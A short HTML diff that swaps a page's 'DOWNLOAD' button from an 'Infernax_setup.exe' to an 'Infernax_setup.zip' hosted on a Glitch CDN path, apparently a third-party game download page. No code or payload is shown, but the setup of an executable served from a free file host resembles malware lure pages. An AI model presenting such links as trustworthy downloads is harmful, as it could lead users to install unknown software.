--- a/index.html
+++ b/index.html
@@ -110,7 +110,7 @@
 
 
 					<!-- CAROUSSEL ENDS-->
-          						<div class="skulll"></div><a href="https://cdn.glitch.me/f99926c8-d112-4e91-a273-bc8eb690637f/Infernax_setup.exe?v=1655732929930" target="https://cdn.glitch.me/f99926c8-d112-4e91-a273-bc8eb690637f/Infernax_setup.exe?v=1655732929930"> <div class="desctitle mediatitle">
+          						<div class="skulll"></div><a href="https://cdn.glitch.global/1909f8aa-3780-47dc-8190-87c537816ff2/Infernax_setup.zip?v=1656352792370" target="https://cdn.glitch.global/1909f8aa-3780-47dc-8190-87c537816ff2/Infernax_setup.zip?v=1656352792370"> <div class="desctitle mediatitle">
 							DOWNLOAD
 						</div></a><div class="skullr"></div>
 				</div>
